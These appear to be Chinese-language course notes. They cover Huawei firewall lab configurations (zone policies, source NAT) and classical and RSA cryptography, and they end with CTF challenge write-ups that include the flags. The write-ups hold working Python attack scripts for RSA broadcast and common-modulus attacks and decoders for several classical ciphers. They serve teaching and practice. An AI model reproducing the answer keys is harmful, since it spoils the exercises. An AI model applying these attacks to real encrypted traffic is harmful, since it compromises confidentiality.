一、网络防火墙配置
练习1-DMZ和Untrust域间策略配置
-
题目描述:为了实现untrust区域的PC1 2.2.2.1能访问DMZ区域的server1服务器,配置安全策略。
-
最后配置形成的拓扑图
-
每个设备需要运行的命令(可直接复制执行)
- FW1
system-view sysname FW1 interface g0/0/1 ip address 192.16.1.254 24 interface g0/0/2 ip address 2.2.2.254 24 quit firewall zone dmz add interface GigabitEthernet 0/0/1 firewall zone untrust add interface GigabitEthernet 0/0/2 quit policy interzone untrust dmz inbound policy 2 policy source 2.2.2.1 mask 32 policy destination 192.16.1.1 mask 32 action permit quit quit
-
运行命令截图
-
Server1
-
FW1
-
PC1
-
-
运行成功截图
练习2.三个区域配置拓扑
-
题目描述:配置防火墙的域间包过滤策略、PC1所在网段能够访问Client1,但是Client1无法访问PC1网段;Client1只允许访问Server1的ICMP、http服务。
-
最后配置形成的拓扑图
-
每个设备需要运行的命令(可直接复制执行)
- FW1
system-view sysname FW1 #防火墙接口配置 interface GigabitEthernet0/0/1 ip address 192.168.1.254 24 interface GigabitEthernet0/0/2 ip address 172.16.1.254 24 interface GigabitEthernet0/0/3 ip address 10.1.1.254 24 quit #将防火墙接口添加到相应的安全区域 firewall zone trust add interface GigabitEthernet0/0/1 firewall zone dmz add interface GigabitEthernet0/0/2 firewall zone untrust add interface GigabitEthernet0/0/3 quit #配置域间策略 policy interzone trust untrust outbound policy 10 policy destination 10.1.1.1 mask 32 policy source 192.168.1.0 mask 24 action permit quit policy interzone untrust dmz inbound policy 1 policy source 10.1.1.1 mask 32 policy destination 172.16.1.1 mask 32 policy service service-set icmp http action permit quit quit
-
运行命令截图
-
PC1
-
FW1
-
Client1
-
Server1
-
- 运行成功截图
练习3-源NAT地址转换实验
-
题目描述:为了使私网中192.168.1.0/24网段的用户可以正常访问Internet,需要在NGFW上配置源NAT策略。除了公网接口的IP地址外,
公司还向ISP申请了2个IP地址(1.1.1.10~1.1.1.11)作为私网地址转换公网地址使用,转换后能访问1.1.1.0/24 -
最后配置形成的拓扑图
-
每个设备需要运行的命令(可直接复制执行)
- AR2
system-view sysname AR2 interface GigabitEthernet 0/0/0 ip address 192.168.1.254 24 interface GigabitEthernet 0/0/1 ip address 10.10.1.1 24 quit ip route-static 0.0.0.0 0 10.10.1.2
- FW1
system-view sysname FW1 interface GigabitEthernet 0/0/1 ip address 10.10.1.2 24 interface GigabitEthernet 0/0/2 ip address 1.1.1.254 24 quit firewall zone trust add interface GigabitEthernet0/0/1 firewall zone untrust add interface GigabitEthernet0/0/2 quit ip route-static 0.0.0.0 0 1.1.1.1 ip route-static 192.168.1.0 24 10.10.1.1 #配置黑洞路由 ip route-static 1.1.1.10 32 NULL0 ip route-static 1.1.1.11 32 NULL0 #配置域间区域 policy interzone trust untrust outbound policy 1 policy source 192.168.1.0 mask 24 policy destination 1.1.1.0 mask 24 policy destination 2.2.2.0 mask 24 action permit quit quit #配置源地址 nat address-group 1 1.1.1.10 1.1.1.11 nat-policy interzone trust untrust outbound policy 2 action source-nat policy source 192.168.1.0 mask 24 address-group 1 quit quit
- Router
system-view sysname Router interface GigabitEthernet 0/0/0 ip address 1.1.1.1 24 interface GigabitEthernet 0/0/1 ip address 2.2.2.254 24 quit ip route-static 0.0.0.0 0 1.1.1.254
-
运行命令截图
-
AR2
-
FW1
-
Router
-
PC1
-
PC2
-
PC4
-
-
运行成功截图
模拟考
- 题目描述:
为了使私网中192.168.1.0/24网段的用户可以正常访问Internet,需要在NGFW上配置源NAT策略。
除了公网接口的IP地址外,公司还向ISP申请了2个IP地址(1.1.1.10~1.1.1.11)作为私网地址转换成公网地址使用,转换后能访问1.1.1.0/24和2.2.2.0/24地址。
网络环境如图所示,其中Router是ISP提供的接入网关。
1.配置PC办公终端IP地址、网关地址。
2.配置路由器接口地址、路由
(1)AR1配置出方向默认路由;
(2)Router配置接口地址。
3.配置防火墙
(1)配置接口地址,划分安全区域;
(2)配置互通路由:
出方向写默认路由、黑洞路由
入方向写明细路由。
(3)配置域间策略policy 1,使Trust区域192.168.1.0/24段地址能够访问Untrust区域1.1.1.0/24、2.2.2.0/24段地址。
4.配置NAPT,使内网192.168.1.0/24段用户转换成公网地址池address-group 1(1.1.1.10~1.1.1.11)访问internat。
5.验证,由PC1、PC2ping2.2.2.1,在防火墙查看会话列表,源地址nat是否转换成功
-
最后配置形成的拓扑图
-
每个设备需要运行的命令(可直接复制执行)
- AR1
system-view sysname AR1 interface GigabitEthernet 0/0/0 ip address 192.168.1.254 24 interface GigabitEthernet 0/0/1 ip address 10.10.1.1 24 quit ip route-static 0.0.0.0 0 10.10.1.2
- FW
system-view sysname FW interface GigabitEthernet 0/0/1 ip address 10.10.1.2 24 interface GigabitEthernet 0/0/2 ip address 1.1.1.254 24 quit firewall zone trust add interface GigabitEthernet0/0/1 firewall zone untrust add interface GigabitEthernet0/0/2 quit ip route-static 0.0.0.0 0 1.1.1.1 ip route-static 192.168.1.0 24 10.10.1.1 #配置黑洞路由 ip route-static 1.1.1.10 32 NULL0 ip route-static 1.1.1.11 32 NULL0 #配置域间区域 policy interzone trust untrust outbound policy 1 policy source 192.168.1.0 mask 24 policy destination 1.1.1.0 mask 24 policy destination 2.2.2.0 mask 24 action permit quit quit #配置源地址 nat address-group 1 1.1.1.10 1.1.1.11 nat-policy interzone trust untrust outbound policy 2 action source-nat policy source 192.168.1.0 mask 24 address-group 1 quit quit
- Router
system-view sysname Router interface GigabitEthernet 0/0/0 ip address 1.1.1.1 24 interface GigabitEthernet 0/0/1 ip address 2.2.2.254 24 quit ip route-static 0.0.0.0 0 1.1.1.254
-
运行命令截图
-
AR1
-
FW
-
Router
-
PC1
-
PC2
-
PC3
-
-
运行成功截图
二、网络安全—密码编码学
1.常见编码(简要介绍,详细看ppt)
-
ascii 码
在计算机中,所有的数据在存储和运算时都要使用二进制数表示,ascii码即
为8位二进制对应256字符的码表。 -
摩斯电码
使用“.”表示短音,使用“-”表示长音,使用“/”或“ ”表示分隔符。 -
base编码
base编码存在的意义是将所有字符的表达集中在一些常见的、可见的字符集
上。
2. 常见的古典密码类型(简要介绍,详细看ppt)
-
栅栏密码:
栅栏密码密钥只有一个数字k,表示栅栏的长度,就是将加密的明文分成k个
一组,然后依次把每组的第n个字连起来,形成一段无规律的话。 -
凯撒密码:
明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移
后被替换成密文。 -
维吉尼亚密码:(特殊的凯撒密码)
维吉尼亚密码则是由一些偏移量不同的恺撒密码组成。为了生成密码,需要使用表格法。偏移量由密码的密钥决定。 -
云影密码:
又称01248密码,用0做间隔,其他非零数隔开后,每组加起来表示序号为
1-26的英文字母,只有大写。
3. 现代密码-rsa
- RSA是典型非对称加密系统,其加解密难度基于大整数分解问题。
- 加密过程
公钥(E,N)
- 解密过程
私钥(D,N)
- E和D是如何计算得到的过程
① 准备两个互质数p,q(提前和大家说明一点,相同的p,q下可以得到多对的E和D)
② N = p * q
③ L = lcm(p-1,q-1):lcm表示求最小公倍数
④ 求E:不是唯一的,任取一个。满足后面两个条件即可,gcd表示最大公约数:
1<E<L,同时 gcd(E,L)=1(也就是E和L互质)
⑤ 求D :当E确定了,D的值也变得唯一,因为只能算出一个。需要满足两个条件,同时这时D的计算方式比较麻烦,只能枚举2到L计算得到(可以参考作者使用java写的程序)
1 < D < L,同时E*D mod L = 1
⑥ 通过具体数字解释public static void main(String[] args) { // 保证p和q互质即可 Integer p=17; Integer q=19; //计算得到 n=p*q= 323; Integer n=p*q; // L = lcm(p-1, q-1)= lcm(16,18) = 144 Integer L=144; // 随机取的一个5,满足互质条件即可。(这里也可以取7,取的不同,后面得到的D也会不同) Integer E=5; Integer D; //循环之后得到一对公钥(5),私钥(19);实际上公钥私钥都是相对的,如果公钥为 19,那么私钥则为 5; for (int i = 2; i < 144; i++) { D=i; if(E*D % L == 1){ System.out.println(D); break; } } // 假设明文 = 123,则 密文=(123的5次方)mod 323=225。 // 解密:明文=(225的29次方)mod 323 =123,所以解密后的明文为123。(作者无法通过java演示,因为数字会过大,导致计算错误) }
4. 密码-rsa常见的攻击方式的特点(靶场题目判断)
- rsa广播攻击:有多个C(明文),多个N
- rsa共模攻击:有2个及两个以上的E,一个N
- rsa低加密指数小明文:E(公钥)比较小
- rsa低解密指数(也称为维纳攻击):E(公钥)特别大
5. 国网技术学院(泰安)靶场题目(讲解)
* 题目整体一览
* 凯撒加密(第一个为题目,第二个为解题程序,第三个为答案)
- 题目
型如flag{***}加密后,密文为gmcj\x80o|\x84\x86X\xd6,求明文。
a='gmcj\x80o|\x84\x86X\xd6' b='flag{' c='' for i in range(5): print(ord(a[i])-ord(b[i])) temp1=1 temp2=1 temp3=1 for i in range(len(a)): c+=chr(ord(a[i])-temp1) temp3=temp2 temp2=temp1+temp2 temp1=temp3 print(c)
flag{good!}
* base加密
- 题目:
Nhwit8Y3NUordknZocPMYFRxj2KiaJCsvVZtQ8NXCzTU4ZGCGfkTtqrycGbmadsQTLfmsK2
flag{327a6c4304ad5938eaf0efb6cc3e53dc}
- 解题思路
- 解题思路
* rsa广播攻击
- 题目
e = 13 n1= 92524936991597191087876963970818192699000837471047570833361814863690117215624182271726144669041983505659467638902416579902938926994684371370584528161658547137504224359103726996826330103457438735550313924659788985151016583670871569078001520895163276682652024979721765888037313024073111969080028401548915584860529087833415360261729733573929336020153998495183047171374610008025906107007868189633396254936451371399512715206524180885726466631961171680737032684040558335907848994165579980698323394324757126691913004750279340397367992376919586081940814067537894461505284800627760042934366651060568756658632559 n2= 47882861583493769792652043915895885711938470011006735368086234918311630735291944884018382340034749356966691872199889087827165231003497124805297898314252131347116985861108032822805283869274755918189419610079937290554651399231597891881104734201327052955612523091262899866624251672392475330631436413697327575811187455580631861926088113872524607626161284142479284858683841270009524277280994923793597438628338107326420845170238602288323355648736295910738442702007217991223982629181446112444553483593640081243492596463130017759009113212441145454676101800987537042692739071914495135292776335690885163386239823 n3= 105121345161568778537500796564275801401688120648445009173256974993138370917194265956191653980821195803457686157829335539012829141165774234357585374787579491811543376426820559128464240217101697871504951848038499315061750224915924576236894677500809983104794816902716120180059054924047804882769032274460760929849651216442149592488466827102265838579767250228595595985281651367536842639511918837429414489458024639144491007786519471599065644854371866037488287093126401150008050984606591522815813056118371138671245796393328811148380957740025982059114031866967745062373001639733954044095500428145039342544316863 c1= 44021578094179205932288298141583959143684018023664861177042691325754443818081769084395526425284909486720278064005104021870779164431277103806967796287490679352306668404569592132266698373208122284552264163546051651872409079297010913580413579444650783707897056758786659608737964832479995896968436467220867962184514688618565540693876233579366577229142298900560553639547522576819353391241452856878889145548736763265869688622430860748392365294208339009676510164941363680546926816583009736795353772131670880911914898624023087011402631179428290830080632860018539213282913972994459264975373437732385771617501637 c2= 19445073906555253525537245829874857990059701639831505552348010486285159596127835263918512553697397476873127356642619496234633582423750907283097479961744699507154761785876909054640469070258906229634558472281655582285098166686817554016788306501605263871435722422254644063131311882876128400550920237748436643513210258820188176528482039434419377375796274744374628283314059522000471608750708748421030848435993883391350222398896915429103628495322429882381312084266081599604608032101884229888851328850487143780426635290589683937293327728914907025978560639685595554270915517277993755511283304326189949765982897 c3= 89991155615199608389965602227251502610230252313158034447374008510409684542002392814878747524489155039338425955744133893962504874964491819169815804880568448244729828000774292853049676484446788711185335159667765003208350967995541408188418810764716808842626467643283794783242721462622492803175198830142984334432322052011230222733236145604638886913445503989451701053752307663530348935590174311775001895650764826399881247640558440586130482610759307610366060500592395382481045472877136782085374872948572290907761673984329777238817152204414479425934681180267452178076205241878700707237400323702289456477071714 求明文m。
#exp #coding:utf-8 from Crypto.Util.number import long_to_bytes,bytes_to_long from gmpy2 import invert, iroot def broadcast(n1, n2 ,n3, c1, c2, c3): n = [n1, n2, n3] C = [c1, c2, c3] N = 1 for i in n: N *= i Ni = [] for ni in n: Ni.append(N // ni) T = [] for i in range(3): T.append(invert(Ni[i], n[i])) X = 0 for i in range(3): X += C[i] * Ni[i] * T[i] m = X % N return m def main(): e = 13 n1=92524936991597191087876963970818192699000837471047570833361814863690117215624182271726144669041983505659467638902416579902938926994684371370584528161658547137504224359103726996826330103457438735550313924659788985151016583670871569078001520895163276682652024979721765888037313024073111969080028401548915584860529087833415360261729733573929336020153998495183047171374610008025906107007868189633396254936451371399512715206524180885726466631961171680737032684040558335907848994165579980698323394324757126691913004750279340397367992376919586081940814067537894461505284800627760042934366651060568756658632559 n2=47882861583493769792652043915895885711938470011006735368086234918311630735291944884018382340034749356966691872199889087827165231003497124805297898314252131347116985861108032822805283869274755918189419610079937290554651399231597891881104734201327052955612523091262899866624251672392475330631436413697327575811187455580631861926088113872524607626161284142479284858683841270009524277280994923793597438628338107326420845170238602288323355648736295910738442702007217991223982629181446112444553483593640081243492596463130017759009113212441145454676101800987537042692739071914495135292776335690885163386239823 n3=105121345161568778537500796564275801401688120648445009173256974993138370917194265956191653980821195803457686157829335539012829141165774234357585374787579491811543376426820559128464240217101697871504951848038499315061750224915924576236894677500809983104794816902716120180059054924047804882769032274460760929849651216442149592488466827102265838579767250228595595985281651367536842639511918837429414489458024639144491007786519471599065644854371866037488287093126401150008050984606591522815813056118371138671245796393328811148380957740025982059114031866967745062373001639733954044095500428145039342544316863 c1=44021578094179205932288298141583959143684018023664861177042691325754443818081769084395526425284909486720278064005104021870779164431277103806967796287490679352306668404569592132266698373208122284552264163546051651872409079297010913580413579444650783707897056758786659608737964832479995896968436467220867962184514688618565540693876233579366577229142298900560553639547522576819353391241452856878889145548736763265869688622430860748392365294208339009676510164941363680546926816583009736795353772131670880911914898624023087011402631179428290830080632860018539213282913972994459264975373437732385771617501637 c2=19445073906555253525537245829874857990059701639831505552348010486285159596127835263918512553697397476873127356642619496234633582423750907283097479961744699507154761785876909054640469070258906229634558472281655582285098166686817554016788306501605263871435722422254644063131311882876128400550920237748436643513210258820188176528482039434419377375796274744374628283314059522000471608750708748421030848435993883391350222398896915429103628495322429882381312084266081599604608032101884229888851328850487143780426635290589683937293327728914907025978560639685595554270915517277993755511283304326189949765982897 c3=89991155615199608389965602227251502610230252313158034447374008510409684542002392814878747524489155039338425955744133893962504874964491819169815804880568448244729828000774292853049676484446788711185335159667765003208350967995541408188418810764716808842626467643283794783242721462622492803175198830142984334432322052011230222733236145604638886913445503989451701053752307663530348935590174311775001895650764826399881247640558440586130482610759307610366060500592395382481045472877136782085374872948572290907761673984329777238817152204414479425934681180267452178076205241878700707237400323702289456477071714 m = broadcast(n1, n2 ,n3, c1, c2, c3) print(long_to_bytes(iroot(m,e)[0])) print(m) if __name__=="__main__": main()
flag{09a3f8480a4a95478274b23fcec4073b}
* rsa共模攻击
- 题目
n=4606214404559381625811305893421796457727307893522234545002637928126211269316759285703114898387185124444125403886775937362327115049887275542033614535006266982230728414436881929499120917023099931731154480279878961462890606099680544893518162357543517663448598189398364777700764201628600330674624309734150799327802881199123017672936478453599758403904501509023550075462646307259074918554393814051649454027370323722466596794338785975786762544233089948295159326932530142156693536761290325166663837198648438565756950669154631177080413510965650961179598568656438763915125788387042278733534990706259579644193764771790940175060031403391673835392301230762706826357767139806907288386554701237375970122539874558801064426127357993451875548199398779957689591805731666683159713949539956972421365823968509961851731675821768810158549871866855970380999634262510655193972343386664235281822656401649891282959851508174717635599479503678209534201303747137636130146004985863109286598472225239106174001881488566658746814277408673886092025714672774526054105715514515828695891197567723115621647063617381815989618596582463826784688350794675454728821530564058656768355901167368323058748745770407030433581712448954059916009598250320631 e1=3961 e2=39661 c1=3837499388455120656867996348713152796258019690191969988843127291215462712127620403068753553367088567073867471571201908322320465885943205429972913247041289009706287142724312212436737393236413143994626064490297937530087295750992739586545671144359484383264416324198087122816045177774320769235002566511128670719776095088328298829387614542992594074076230396124614177801908183924912637040706013914289088681433669011388036613446129356409413670671292406747678040705779573864607561270257783753748995854744272261777745636348393124375470191723259093713990560245604156212381175794384987660240632069882683243408009197662876297392776499829139942540170411011193477140582442543447240154732018020414636543952622244587297337516302276577587483341242855629750723299196962652280980029833172306621035030602001489526266471628252411072394649732898826828650082323467831447543341986110050674843712168131578454880285847519984505884537048953401917291988302822640969586523078595398214110577364335572792040908066353542797711044609986818407526276623134883604311196929194845167221887179349308411987286918430402955406174717953513907354499985297123553922220999152076137186010008440300860402391806368607939701458636422792104581468853500339 c2=516144633013811112886792001654989445834450364017535055282084776134066047140744541127402208154454108824957465184368293981255055118766542087965844721575465557839124537125203069445424537449162248750901106984608201441498157229171325843327039518601149565688635319745251796978492834090711540621416140758667450469649514609322384993669552881669681643734184080837236954659699909281354088531456248420524775156766607176790285297650370408663229065136104192025279935464662164797806028666156110000187437655498203412062698329219949262308813700244536928610798624752546494028242097373072925895540589396299985380749410374578133264869591859011242071818144027791627763313385218323524098953707340678077645156833716581370443623533390586314124336677442618178538774474320682299728631032427623000842464650999067403676635741792096149059056559990879456070044148573842587508520690390257812232611111313987359329328645067153673069467853801400328324497262436640915685606632521893541501538305824059283975767319250940633479844145489924915801010604008722966099476172080678828712862231281409246368873360519426922362725054985113908840947023751123519796668861742282682908592604065917742647822853267591956812814541551684160810120141854610728 求明文m。
import libnum import gmpy2 n=4606214404559381625811305893421796457727307893522234545002637928126211269316759285703114898387185124444125403886775937362327115049887275542033614535006266982230728414436881929499120917023099931731154480279878961462890606099680544893518162357543517663448598189398364777700764201628600330674624309734150799327802881199123017672936478453599758403904501509023550075462646307259074918554393814051649454027370323722466596794338785975786762544233089948295159326932530142156693536761290325166663837198648438565756950669154631177080413510965650961179598568656438763915125788387042278733534990706259579644193764771790940175060031403391673835392301230762706826357767139806907288386554701237375970122539874558801064426127357993451875548199398779957689591805731666683159713949539956972421365823968509961851731675821768810158549871866855970380999634262510655193972343386664235281822656401649891282959851508174717635599479503678209534201303747137636130146004985863109286598472225239106174001881488566658746814277408673886092025714672774526054105715514515828695891197567723115621647063617381815989618596582463826784688350794675454728821530564058656768355901167368323058748745770407030433581712448954059916009598250320631 e1=3961 e2=39661 c1=3837499388455120656867996348713152796258019690191969988843127291215462712127620403068753553367088567073867471571201908322320465885943205429972913247041289009706287142724312212436737393236413143994626064490297937530087295750992739586545671144359484383264416324198087122816045177774320769235002566511128670719776095088328298829387614542992594074076230396124614177801908183924912637040706013914289088681433669011388036613446129356409413670671292406747678040705779573864607561270257783753748995854744272261777745636348393124375470191723259093713990560245604156212381175794384987660240632069882683243408009197662876297392776499829139942540170411011193477140582442543447240154732018020414636543952622244587297337516302276577587483341242855629750723299196962652280980029833172306621035030602001489526266471628252411072394649732898826828650082323467831447543341986110050674843712168131578454880285847519984505884537048953401917291988302822640969586523078595398214110577364335572792040908066353542797711044609986818407526276623134883604311196929194845167221887179349308411987286918430402955406174717953513907354499985297123553922220999152076137186010008440300860402391806368607939701458636422792104581468853500339 c2=516144633013811112886792001654989445834450364017535055282084776134066047140744541127402208154454108824957465184368293981255055118766542087965844721575465557839124537125203069445424537449162248750901106984608201441498157229171325843327039518601149565688635319745251796978492834090711540621416140758667450469649514609322384993669552881669681643734184080837236954659699909281354088531456248420524775156766607176790285297650370408663229065136104192025279935464662164797806028666156110000187437655498203412062698329219949262308813700244536928610798624752546494028242097373072925895540589396299985380749410374578133264869591859011242071818144027791627763313385218323524098953707340678077645156833716581370443623533390586314124336677442618178538774474320682299728631032427623000842464650999067403676635741792096149059056559990879456070044148573842587508520690390257812232611111313987359329328645067153673069467853801400328324497262436640915685606632521893541501538305824059283975767319250940633479844145489924915801010604008722966099476172080678828712862231281409246368873360519426922362725054985113908840947023751123519796668861742282682908592604065917742647822853267591956812814541551684160810120141854610728 def exp_def(e1,e2,c1,c2,n): s,s1,s2 = gmpy2.gcdext(e1, e2) m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0] return int(m) m=exp_def(e1,e2,c1,c2,n) print(libnum.n2s(m))
flag{gongmogongji!}
* 摩斯电码
- 题目
-- --- .-. ... . -.-. --- -.. .
flag{MORSECODE}
- 解题思路
- 解题思路
* 凯撒加密-3
```txt
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']
alphabet = 'abcdefghijklmnopqrstuvwxyz{}'
flag = '************'
c = ''
count=0
for i in flag:
count=count+1
print(count)
c+= table[alphabet.index(i)]
print(c)
# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
```
```python
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']
alphabet = 'abcdefghijklmnopqrstuvwxyz{}'
flag = ''
b=[]
c = '0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
for i in range(0,len(c),5):
print(c[i:i+5])
flag+=alphabet[table.index(c[i:i+5])]
print(flag)
# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
```
```txt
flag{taianxiaoqu}
```
* 凯撒加密-2
- 题目
密文为fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT,明文型如flag{***}。
a='fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT' b='flag{' c='' for i in range(5): print(ord(a[i])-ord(b[i])) for i in range(len(a)): if i%2==0: c+=chr(ord(a[i])-i) else: c+=chr(ord(a[i])+i) print(c)
flag{d7c442c4-c4c7-46c6-9407-35f030a46cf2}
* 维吉尼亚
- 题目
密文为``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x由维吉尼亚密码加密而来,密钥6位,明文为型如flag{***}。
a='``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x' b='flag{' c='' # 维吉尼亚密码 for i in range(5): print(ord(a[i])-ord(b[i])) key=[-6,-12,-7,-5,-8,-5] key.append(5) print(key) for i in range(len(a)): c+=chr(ord(a[i])-key[i%6]) print(c)
flag{Vigenère_is_very_interesting!!}
* 栅栏密码
- 题目
一串型如flag{***}的字符串栅栏加密后为:fghai}l{anmazlma,其中栏数为3。
# _*_ encoding:utf-8 _*_ import math def buwei(encrypted_str,fence_length): # 比如 14,4 str_len = len(encrypted_str) fence_count = math.ceil(str_len/ fence_length) # 得出4 target_length = fence_count*fence_length jiequ = [] while str_len<target_length: encrypted_str = encrypted_str + '*' jiequ.append(encrypted_str[-fence_count :]) encrypted_str = encrypted_str[:-fence_count] str_len += 1 jiequ.reverse() s = '' for i in jiequ: s = s + i result = encrypted_str + s return result def decrypt_fence(encrypted_str,fence_length): encrypted_str = buwei(encrypted_str,fence_length) if fence_length>=len(encrypted_str) or fence_length<1: print("栅栏长度太大或者太小,无需解密") return fence_count = math.ceil(len(encrypted_str)/fence_length) elen=len(encrypted_str) # b = elen // f # 用字符串实际长度除以上面计算出能整出的数字f result = {x: '' for x in range(fence_count)} for i in range(elen): # 字符串有多少位,就循环多少次 a = i % fence_count result.update({a: result[a] + encrypted_str[i]}) # 字符串截断,并更新数据 d = '' for i in range(len(result)): d += result[i] d = d.replace("*", '') print(f'假设每栏字数为:{fence_length},解密结果为:{d}') # 输出结果,并开始下一个循环 for i in range(2,10): decrypt_fence('fghai}l{anmazlma', i)
flag{zhalanmima}
* 云影密码
- 题目
8842101220480224404014224202480122
a='8842101220480224404014224202480122' s=a.split('0') print(s) l=[] flag='' for i in range(len(s)): sum=0 for j in range(len(s[i])): sum+=int(s[i][j]) l.append(sum) print(l) for i in range(len(l)): flag+=chr(ord('A')+l[i]-1) print(flag)
flag{WELLDONE}
* base64隐写
- 题目
U3RlZ2Fub2dyYXBoeSBpcyB0aGUgYXJ0IGFuZCBzY2llbmNlIG9m IHdyaXRpbmcgaGlkZGVuIG1lc3NhZ2VzIGluIHN1Y2ggYSB3YXkgdGhhdCBubyBvbmV= LCBhcGFydCBmcm9tIHRoZSBzZW5kZXIgYW5kIGludGVuZGVkIHJlY2lwaWVudCwgc3VzcGU= Y3RzIHRoZSBleGlzdGVuY2Ugb2YgdGhlIG1lc3M= YWdlLCBhIGZvcm0gb2Ygc2VjdXJpdHkgdGhyb3VnaCBvYnNjdXJpdHkuIFS= aGUgd29yZCBzdGVnYW5vZ3JhcGh5IGlzIG9mIEdyZWVrIG9yaWdpbiBhbmQgbWVhbnMgImNvbmNlYW== bGVkIHdyaXRpbmciIGZyb20gdGhlIEdyZWVrIHdvcmRzIHN0ZWdhbm9zIG1lYW5pbmcgImNv dmVyZWQgb3IgcHJvdGVjdGVkIiwgYW5kIGdyYXBoZWluIG1lYW5pbmcgInRvIHc= cml0ZSIuIFRoZSBmaXJzdCByZWNvcmRlZCB1c2Ugb2YgdGhlIHRlcm0gd2FzIGluIDE0OTkgYnkgSm9o YW5uZXMgVHJpdGhlbWl1cyBpbiBoaXMgU3RlZ2Fub2dyYXBoaWEsIGEgdHJlYV== dGlzZSBvbiBjcnlwdG9ncmFwaHkgYW5kIHN0ZWdhbm9ncmFwaHkgZGlzZ8== dWlzZWQgYXMgYSBib29rIG9uIG1hZ2ljLiBHZW5lcmFsbHksIG1lc3P= YWdlcyB3aWxsIGFwcGVhciB0byBiZSBzb21ldGhpbmcgZWxzZTogaW1hZ2VzLCBhcnRp Y2xlcywgc2hvcHBpbmcgbGlzdHMsIG9yIHNvbWUgb3R= aGVyIGNvdmVydGV4dCBhbmQsIGNsYXNzaWNhbGx5LCB0aGUgaGlkZGVuIG1lc3NhZ2UgbWF5IGJlIGluIGludmm= c2libGUgaW5rIGJldHdlZW4gdGhlIHZpc2libGUgbGluZXMgb2YgYSBwcml2YXRlIGxldHRlci4NCg0KVGhl IGFkdmFudGFnZSBvZiBzdGVnYW5vZ3JhcGh5LCBvdmVyIGNy eXB0b2dyYXBoeSBhbG9uZSwgaXMgdGhhdCBtZXNzYWdlcyBkbyBub3QgYXR0cmFjdCBhdHRlbnRpb25= IHRvIHRoZW1zZWx2ZXMuIFBsYWlubHkgdmlzaWJsZSBlbmNyeXB0ZWQgbWVzc2FnZXOXbm8gbWF0dGVyIF== aG93IHVuYnJlYWthYmxll3dpbGwgYXJvdXNlIHN= dXNwaWNpb24sIGFuZCBtYXkgaW4gdGhlbXNlbHZlcyBiZSBpbmNyaW1pbmF0aW5nIP== aW4gY291bnRyaWVzIHdoZXJlIGVuY3J5cHRpb24gaXMgaWxsZWdhbC4gVGhlcmVmb3JlLH== IHdoZXJlYXMgY3J5cHRvZ3JhcGh5IHByb3RlY3RzIHRoZSBjb250ZW50cyBvZj== IGEgbWVzc2FnZSwgc3RlZ2Fub2dyYXBoeSBjYW4gYmUgc2FpZCB0byBwcm90ZWN0IGJ= b3RoIG1lc3NhZ2VzIGFuZCBjb21tdW5pY2F0aW5nIHBhcnRpZXMuDQoNClN0ZWdhbm9ncmFwaHkgaW5jbHW= ZGVzIHRoZSBjb25jZWFsbWVudCBvZiBpbmZvcm1hdGlvbiB3aXRoaW4gY29t cHV0ZXIgZmlsZXMuIEluIGRpZ2l0YWwgc3RlZ2Fub2dyYXBoeSwgZWxlY3Ryb25pYyBjb21tdW5pY2F0aW9u cyBtYXkgaW5jbHVkZSBzdGVnYW5vZ3JhcGhpYyBjb2RpbmcgaW5zaZ== ZGUgb2YgYSB0cmFuc3BvcnQgbGF5ZXIsIHN1Y2ggYXMgYSBkb2N1bWVudCBmaWxlLCBpbWFnZSBmaWx= ZSwgcHJvZ3JhbSBvciBwcm90b2NvbC4gTWVkaWEg ZmlsZXMgYXJlIGlkZWFsIGZvciBzdGVnYW5vZ3JhcGhpYyB0cmFuc21pc3Npb+== biBiZWNhdXNlIG9mIHRoZWlyIGxhcmdlIHNpemUuIEFzIB== YSBzaW1wbGUgZXhhbXBsZSwgYSBzZW5kZXIgbWlnaHQgc3RhcnQgd2l0aCBh biBpbm5vY3VvdXMgaW1hZ2UgZmlsZSBhbmQgYWRqdXN0IHRoZSBjb2xvciBvZiBldmVyeSAxMDB0aCBwaXhlbCD= dG8gY29ycmVzcG9uZCB0byBhIGxldHRlciBpbiB0aGUgYWxwaGFiZXQsIGF= IGNoYW5nZSBzbyBzdWJ0bGUgdGhhdCBzb21lb25lIG5vdCBzcGVjaWZpY2FsbHkgbG9va2luZyBm b3IgaXQgaXMgdW5saWtlbHkgdG8gbm90aWNlIGl0Lg0KDQpUaGU= IGZpcnN0IHJlY29yZGVkIHVzZXMgb2Ygc3RlZ2Fub2dyYXBoeSBjYW4gYmUgdHJ= YWNlZCBiYWNrIHRvIDQ0MCBCQyB3aGVuIEhlcm9kb3R1cyBtZW50aW9ucyB0d28gZXhhbXBsZXMgb+== ZiBzdGVnYW5vZ3JhcGh5IGluIFRoZSBIaXN0b3JpZXMgb2Yg SGVyb2RvdHVzLiBEZW1hcmF0dXMgc2VudCBhIHdhcm5pbmcgYWJvdXQgYSB= Zm9ydGhjb21pbmcgYXR0YWNrIHRvIEdyZWVjZSBieSB3 cml0aW5nIGl0IGRpcmVjdGx5IG9uIHRoZSB3b29kZW4gYmFja2luZyBvZiBhIHdheCB0YWJsZXQgYmVm b3JlIGFwcGx5aW5nIGl0cyBiZWVzd2F4IHN1cmZhY2UuIFdheCB0YWJsZXRzIHdlcmUgaW4gY29tbW9uIHVzZV== IHRoZW4gYXMgcmV1c2FibGUgd3JpdGluZyBzdXJmYWNlcywgc29tZXRpbWX= cyB1c2VkIGZvciBzaG9ydGhhbmQuIEFub3RoZXIgYW5jaWVudCBleGFtcGxlIGlzIHRoYXQgb9== 